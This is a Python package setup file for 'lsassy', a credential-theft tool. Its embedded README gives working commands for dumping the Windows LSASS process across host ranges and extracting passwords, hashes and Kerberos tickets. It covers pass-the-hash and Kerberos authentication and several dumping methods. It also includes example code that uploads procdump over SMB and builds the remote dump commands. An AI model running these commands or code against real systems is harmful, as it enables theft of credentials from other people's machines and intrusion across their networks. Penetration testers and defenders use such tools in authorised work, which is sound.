# -*- coding: utf-8 -*-
from setuptools import setup

packages = \
['lsassy', 'lsassy.dumpmethod', 'lsassy.exec', 'lsassy.output']

package_data = \
{'': ['*'], 'lsassy': ['resources/*']}

install_requires = \
['impacket>=0.9.22,<0.10.0',
 'netaddr>=0.8.0,<0.9.0',
 'pypykatz>=0.4.8,<0.5.0',
 'rich>=10.6.0,<11.0.0']

entry_points = \
{'console_scripts': ['lsassy = lsassy.console:main']}

setup_kwargs = {
    'name': 'lsassy',
    'version': '3.0.1',
    'description': 'Tool to remotely extract credentials',
    'long_description': '# lsassy\n\n\n[![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=3.0.0&x2=0)](https://pypi.org/project/lsassy/) [![Tests](https://github.com/hackndo/lsassy/workflows/Tests/badge.svg)](https://github.com/hackndo/lsassy/actions?workflow=Tests) [![Twitter](https://img.shields.io/twitter/follow/hackanddo?label=HackAndDo&style=social)](https://twitter.com/intent/follow?screen_name=hackanddo)\n\n<a href="https://asciinema.org/a/441582?autoplay=1" target="_blank"><img src="https://asciinema.org/a/441582.svg" width="80%"></a>\n\nPython tool to remotely extract credentials on a set of hosts. This [blog post](https://en.hackndo.com/remote-lsass-dump-passwords/) explains how it works.\n\nThis tool uses [impacket](https://github.com/SecureAuthCorp/impacket) project to remotely read necessary bytes in lsass dump and [pypykatz](https://github.com/skelsec/pypykatz) to extract credentials.\n\n| Chapters                                     | Description                                             |\n|----------------------------------------------|---------------------------------------------------------|\n| [Warning](#warning)                          | Before using this tool, read this                       |\n| [Installation](#installation)                | Lsassy installation                                     |\n| [Basic usage](#basic-usage)                  | Basic lsassy usage                                      |\n| [Advanced usage](#advanced-usage)            | Advanced lsassy usage with params explaination          |\n| [Add dump method](#add-dump-method)          | How to add a custom lsass dump method                   |\n| [Acknowledgments](#acknowledgments)          | Kudos to these people and tools                         |\n| [Official Discord](#official-discord-channel)| Official Discord channel                                |\n\n## Warning\n\nAlthough I have made every effort to make the tool stable, traces may be left if errors occur.\n\nThis tool can either leave some lsass dumps if it failed to delete it (even though it tries hard to do so) or leave a scheduled task running if it fails to delete it. This shouldn\'t happen, but it might. Now, you know, use it with caution.\n\n## Installation\n\n**lsassy** works with python >= 3.7\n\n### pip (Recommended)\n\n```bash\npython3 -m pip install lsassy\n```\n\n### From source for development\n\n```\npython3 setup.py install\n```\n\n## Basic Usage\n\n**lsassy** works out of the box on multiple targets (IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets)\n\n```bash\nlsassy [-d domain] -u user -p password targets\nlsassy [-d domain] -u user -H [LM:]NT targets\n```\n\nBy default, lsassy will try to dump lsass remotely using `comsvcs.dll` method, either via WMI or via a remote scheduled task.\n\n### Kerberos\n\n**lsassy** can authenticate with Kerberos. It requires a valid TGT in `KRB5CCNAME` environment variable. See [advanced usage](Lsassy-Advanced-Usage#kerberos) for more details.\n\n```bash\nlsassy -k targets\n```\n\n\n### Examples\n\n```bash\n lsassy -d adsec.local -u pixis -p p4ssw0rd 192.168.1.0/24\n lsassy -d adsec.local -u pixis -p p4ssw0rd 192.168.1.1-10\n lsassy -d adsec.local -u pixis -p p4ssw0rd hosts.txt\n lsassy -d adsec.local -u pixis -p p4ssw0rd 192.168.1.1-192.168.1.10\n```\n\n## Advanced Usage\n\nDifferent lsass dumping methods are implemented in **lsassy**, and some option are provided to give control to the user on how the tool will proceed.\n\n### Internal working\n\n**lsassy** is divided in modules\n\n```\n                   +-----------+\n                   |   Writer  |\n                   +-----+-----+\n                         |\n                         |\n +----------+      +-----+-----+    +---------+\n |  Parser  |------|   Core    |----| Session |\n +----------+      +-----+-----+    +---------+\n                         |\n                         |\n                   +-----------+\n                   |    Dump   |-+\n                   |  Methods  | |-+    +----------+\n                   +-----+-----+ | |----|   File   |\n                     +-----------+ |    +----------+\n                      +------------+\n                         |\n                         |\n                   +-----------+\n                   |    Exec   |-+\n                   |  Methods  | |-+\n                   +-----+-----+ | |\n                     +-----------+ |\n                      +------------+\n```\n\n#### Core module\n\nThis module is the orchestrator. It creates lsassy class with provided arguments and options, and then calls the different modules to retrieve credentials.\n\n#### Logger module\n\nThis module is used for logging purpose.\n\n#### File module\n\nThis is a layer built over Impacket to behave like a python built-in file object. It overrides methods like open, read, seek, or close.\n\n#### Dumper module\n\nThis module is where all the dumping logic happens. Depending on the method used, it will execute code on remote host to dump lsass using provided method.\n\n#### Parser module\n\nThis module relies on pypykatz and uses **lsassy** file module to remotely parse lsass dump\n\n#### Writer module\n\nThis module handles the output part, either to the screen in different formats and/or write results to a file\n\n### Dumping methods\n\nThis tool can dump lsass in different ways.\n\nDumping methods (`-m` or `--method`)\n* comsvcs\n* comsvcs_stealth\n* dllinject\n* procdump\n* procdump_embedded\n* dumpert\n* dumpertdll\n* ppldump\n* ppldump_embedded\n\n#### comsvcs method\n\nThis method **only uses built-in Windows files** to extract remote credentials. It uses **minidump** function from **comsvcs.dll** to dump **lsass** process.\n\n#### Procdump method\n\nThis method uploads **procdump.exe** from SysInternals to dump **lsass** process. \n\n#### Dumpert method\n\nThis method uploads **dumpert.exe** from [outflanknl](https://github.com/outflanknl/Dumpert) to dump **lsass** process. \n\n#### Dumpertdll method\n\nThis method uploads **dumpert.dll** from [outflanknl](https://github.com/outflanknl/Dumpert) to dump **lsass** process. It will be run via rundll32 utility.\n\n#### Options\n\nFor some dumping method, options are required, like procdump or dumpert path. These options can be set using `--options` or `-O` with a comma separated list of options in a `key=value` way.\n\n```\n... --options key=value,foo=bar\n```\n\nFor example:\n\n```bash\nlsassy -d adsec.local -u pixis -p h4cknd0 dc01.adsec.local -m procdump    -O procdump_path=/opt/Sysinternals/procdump.exe\nlsassy -d adsec.local -u pixis -p h4cknd0 dc01.adsec.local -m dumpert     -O dumpert_path=/opt/dumpert.exe\nlsassy -d adsec.local -u pixis -p h4cknd0 dc01.adsec.local -m dumpertdll  -O dumpertdll_path=/opt/dumpert.dll\n```\n\n#### Parse only\n\nYou can choose to parse an already dumped lsass process by providing `--parse-only` switch, alongside with `--dump-path` and `--dump-name` parameters.\n\nNote that if you choose this method, the **remote lsass dump won\'t be deleted**.\n\nFor example:\n\n```bash\nlsassy -d adsec.local -u pixis -p h4cknd0 dc01.adsec.local --parse-only --dump-path "/Windows/Temp" --dump-name "lsass.dmp"\n```\n\n### Kerberos tickets harvesting\n\nYou can extract in-memory Kerberos tickets by using `-K [directory]` or `--kerberos-dir [directory]` parameter. It will extract and save Kerberos tickets in `kirbi` format in the provided output directory. If this directory doesn\'t exist, the tool will attempt to create it before outputing tickets.\n\n```bash\nlsassy -d adsec.local -u pixis -p h4cknd0 dc01.adsec.local -K \'/tmp/kerberos_tickets\'\n```\n\n### Authentication methods\n\nThere are three different ways to authenticate against remote targets using **lsassy**. The only requirement is that the user needs to have local administration rights on the remote targets.\n\n#### Cleartext credentials\n\nFirst and most obvious one is by using clear text credentials. It can either be a local or domain user.\n\n```bash\n## Local user\nlsassy -u pixis -p p4ssw0rd server01.adsec.local\n\n## Domain user\nlsassy -d adsec.local -u jsnow -p WinterIsComing server01.adsec.local\n```\n\n#### Pass-the-hash\n\nIt is also possible to authenticate using user\'s NT hash. You can either provide LM:NT or only NT version.\n\n```bash\nlsassy -d adsec.local -u jsnow -H 38046f6aa4f7283f9a6b7e1575452109 server01.adsec.local\naad3b435b51404eeaad3b435b51404ee\n\n## Or\n\nlsassy -d adsec.local -u jsnow -H aad3b435b51404eeaad3b435b51404ee:38046f6aa4f7283f9a6b7e1575452109 server01.adsec.local\n```\n\n#### Kerberos\n\nYou can also authenticate using Kerberos. For this to work, you will need to have a valid ticket saved on disk, and ticket\'s path needs to be provided in `KRB5CCNAME` environment variable. For testing purpose, this can be achieved using impacket **getTGT.py** tool.\n\n```bash\ngetTGT.py adsec.local/jsnow:WinterIsComing -dc-ip dc01.adsec.local\n```\n\nThis command will request a TGT and save it in `jsnow.ccache` file.\n\nIn order for **lsassy** to know which ticket to use, you\'ll need to explicitly set the ticket\'s path in `KRB5CCNAME` environment variable.\n\n```bash\nexport KRB5CCNAME="/home/pixis/jsnow.ccache"\n```\n\nWhen it\'s correctly configured, you should be able to use that ticket for authentication using `-k` parameter. Since you\'re using this ticket, you don\'t need to provide other authentication information anymore.\n\n```bash\nlsassy -k server01.adsec.local\n```\n\nNote that for this to work, you will need a valid DNS configuration, either dynamic with a valid DNS server, or static using `hosts` file. Moreover, you should always use FQDN when generating tickets and using **lsassy**, i.e. use `server01.adsec.local` instead of `server01`.\n\n### Output\n\n#### Screen format\n\n**lsassy** can output credentials in different formats using `--format` or `-f` flag\n\n##### Pretty\n\nDefault format, nice and clean credentials are displayed with golden colors. In credz we trust.\n\n```\nlsassy [-d domain] -u user -p password --format pretty targets\n```\n\n##### Json\n\nDisplays result in json format. Can be useful when called from a script\n```\nlsassy [-d domain] -u user -p password --format json targets\n```\n\n##### Grep\n\nGrepable output that can be useful in one-liners\n\n```\nlsassy [-d domain] -u user -p password --format grep targets\n```\n\n##### None\n\nDoesn\'t display the result. Useful when using `--outfile`\n```\nlsassy [-d domain] -u user -p password targets --format none\n```\n\n#### Save in a file\n\nSaves the result in a grepable format in provided file (`--outfile` or `-o`)\n```\nlsassy [-d domain] -u user -p password targets --format json --outfile /tmp/credentials.txt\n```\n\n#### Results filtering\n\nIf you want to only get users credentials, filtering out computers credentials, you can use `--users` flag\n```\nlsassy [-d domain] -u user -p password targets --users\n```\n\n#### Thread management\n\nYou can decide how many thread you want to use \\[1-256\\] using `--threads` parameter.\n\n```\nlsassy [-d domain] -u user -p password targets --threads 32\n```\n\n\n## Add dump method\n\nThere is a **dummy.py** file in **dumpmethod** directory. This file contains basic structure to create a new dump method functionnality.\n\n### get_commands\n\nThis method is mandatory as it is the method that will be used to execute code on the remote host in order to dump lsass in some way. It **must** return a dictionnary with two items **cmd** and **pwsh**.\n\n**cmd** command is a command understood by **cmd.exe** utility\n**pwsh** command is a command understood by powershell (most of the time, **cmd** command is also valid in powershell)\n\n```python\nreturn {\n    "cmd": cmd_command,\n    "pwsh": pwsh_command\n}\n```\n\n### (Optionnal) prepare\n\nThis method will be called **before** executing commands provided by **get_commands**. It can be used to upload files or check stuff\n\n### (Optionnal) clean\n\nThis method will be called **after** executing commands provided by **get_commands**. It can be used to delete uploaded files or clean stuff.\n\n### Example\n\nHere is procdump example with some comments\n\n```python\nimport logging\nimport os\nimport time\n\nfrom lsassy.dumpmethod.idumpmethod import IDumpMethod\n\n\nclass DumpMethod(IDumpMethod):\n\n    """\n    If your dumping method cannot produce a dumpfile with a custom dumpfile name, you must set this setting to False\n    and uncomment \'dump_name\' to provide expected dumpfile name on remote system.\n    """\n    custom_dump_name_support = True  # Default: True\n    # dump_name              = ""    # Default: Random dumpfile name\n\n    """\n    If your dumping method cannot produce a dumpfile in a custom directory, you must set this setting to False\n    and uncomment \'dump_share\' and \'dump_path\' to provide expected dumpfile location on remote system.\n    """\n    custom_dump_path_support = True  # Default: True\n    # dump_share             = ""    # Default: "C$"\n    # dump_path              = ""    # Default: "\\\\Windows\\\\Temp\\\\"\n\n    def __init__(self, session):\n        """\n        __init__ is overloaded to create some instance variables\n        """\n        super().__init__(session)\n        self.procdump = "procdump.exe"\n        self.procdump_path = False\n        self.procdump_remote_share = "C$"\n        self.procdump_remote_path = "\\\\Windows\\\\Temp\\\\"\n\n        self.procdump_uploaded = False\n\n    def prepare(self, options):\n        """\n        Prepare method is overloaded so that we are able to\n        - check if mandatory parameters are provided\n        - upload procdump on the remote host.\n        """\n        self.procdump = options.get("procdump", self.procdump)\n        self.procdump_path = options.get("procdump_path", self.procdump_path)\n        self.procdump_remote_share = options.get("procdump_remote_share", self.procdump_remote_share)\n        self.procdump_remote_path = options.get("procdump_remote_path", self.procdump_remote_path)\n\n        if not self.procdump_path:\n            logging.error("Missing procdump_path")\n            return None\n\n        if not os.path.exists(self.procdump_path):\n            logging.error("{} does not exist.".format(self.procdump_path))\n            return None\n\n        # Upload procdump\n        logging.debug(\'Copy {} to {}\'.format(self.procdump_path, self.procdump_remote_path))\n        with open(self.procdump_path, \'rb\') as p:\n            try:\n                self._session.smb_session.putFile(self.procdump_remote_share, self.procdump_remote_path + self.procdump, p.read)\n                logging.success("Procdump successfully uploaded")\n                self.procdump_uploaded = True\n                return True\n            except Exception as e:\n                logging.error("Procdump upload error", exc_info=True)\n                return None\n\n    def clean(self):\n        """\n        Clean method is overloaded so that we are able to delete procdump if it was uploaded\n        """\n        if self.procdump_uploaded:\n            t = time.time()\n            while True:\n                try:\n                    self._session.smb_session.deleteFile(self.procdump_remote_share, self.procdump_remote_path + self.procdump)\n                    logging.debug("Procdump successfully deleted")\n                    return True\n                except Exception as e:\n\n                    if time.time() - t > 5:\n                        logging.warning("Procdump deletion error.")\n                        return False\n                    logging.debug("Procdump deletion error. Retrying...")\n                    time.sleep(0.2)\n\n    def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):\n        """\n        get_commands method is overloaded as it is mandatory.\n        Two different ways of dumping lsass with cmd.exe and powershell are provided and returned.\n        """\n        cmd_command = """for /f "tokens=2 delims= " %J in (\'"tasklist /fi "Imagename eq lsass.exe" | find "lsass""\') do {}{} -accepteula -o -ma %J {}{}""".format(\n            self.procdump_remote_path, self.procdump,\n            self.dump_path, self.dump_name\n        )\n        pwsh_command = """{}{} -accepteula -o -ma (Get-Process lsass).Id {}{}""".format(\n            self.procdump_remote_path, self.procdump,\n            self.dump_path, self.dump_name\n        )\n        return {\n            "cmd": cmd_command,\n            "pwsh": pwsh_command\n        }\n\n```\n\nYou can check dummy class for more comments and/or informations.\n\n\n\n## Changelog\n\n```\nv3.0.0\n------\n* Complete rewrite of the tool\n    * Way more modular\n    * Easy way to add new dump method, exec method, output formats\n* Add new dump methods\n    * dumpertdll\n    * comsvcs_stealth\n    * procdump_embedded\n    * dllinject (advanced)\n    * ppldump\n    * ppldump_embedded\n    * wer\n* Add execution methods\n    * SMB service creation\n    * SMB service modification\n    * MMC\n* Add "parse-only" feature to parse remote existing dump\n* Rewrote multithread logic\n* Random dump extension by default\n\nv2.1.0\n------\n* Kerberos authentication support (Thank you laxa for PR)\n* Add CME module for python3\n* Update bloodhound queries for BloodHound3\n* Bug fixes\n\nv2.0.0\n------\n* Multiprocessing support to dump credentials on multiple hosts at a time\n* Add new dumping method using "dumpert"\n* Can be used as a library in other python projects\n* Syntax changed to be more flexible\n* Complete code refactoring, way more organized and easy to maintain/extend\n* Better error handling\n* Complete wiki\n\nv1.1.0\n------\n* Better execution process : --method flag has been added and described in help text\n* Uses random dump name\n* Chose between cmd, powershell, dll and/or procdump methods\n* CME module is now using light lsassy WMIExec et TASKExec implementation\n* Bug fixes\n\nv1.0.0\n------\n* Built-in lsass dump\n** Lsass dump using built-in Windows\n** Lsass dump using procdump (using -p parameter)\n* Add --dumppath to ask for remote parsing only\n* Code refactoring\n* Add --quiet to quiet output\n\nv0.2.0\n------\n* Add BloodHound option to CME module (-o BLOODHOUND=True)\n    - Set compromised targets as "owned" in BloodHound\n    - Check if compromised users have at least one path to domain admin\n* Custom parsing (json, grep, pretty [default])\n* New --hashes option to lsassy\n* Include CME module in repository\n* Add credentials to CME database\n\n\nv0.1.0\n------\nFirst release\n```\n\n## Acknowledgments\n\n![image](https://user-images.githubusercontent.com/11051803/127148091-6b52f38a-de64-4114-b1ef-465e65deacfb.png)\n\n* [Kodoque](https://github.com/Kodoque1) for lsassy name\n* [Impacket](https://github.com/SecureAuthCorp/impacket)\n* [SkelSec](http://twitter.com/skelsec) for Pypykatz, but also for his patience and help\n* [mpgn](https://twitter.com/mpgn_x64) for his help and ideas\n\n## Official Discord Channel\n\n[![Porchetta Industries](https://discordapp.com/api/guilds/736724457258745996/widget.png?style=banner3)](https://discord.gg/sEkn3aa)\n\n## Known bugs\n\n* Compiled versions don\'t include table_output because of some weird error with rich library',
    'author': 'pixis',
    'author_email': 'hackndo@gmail.com',
    'maintainer': None,
    'maintainer_email': None,
    'url': 'https://github.com/hackndo/lsassy',
    'packages': packages,
    'package_data': package_data,
    'install_requires': install_requires,
    'entry_points': entry_points,
    'python_requires': '>=3.7,<4.0',
}


setup(**setup_kwargs)
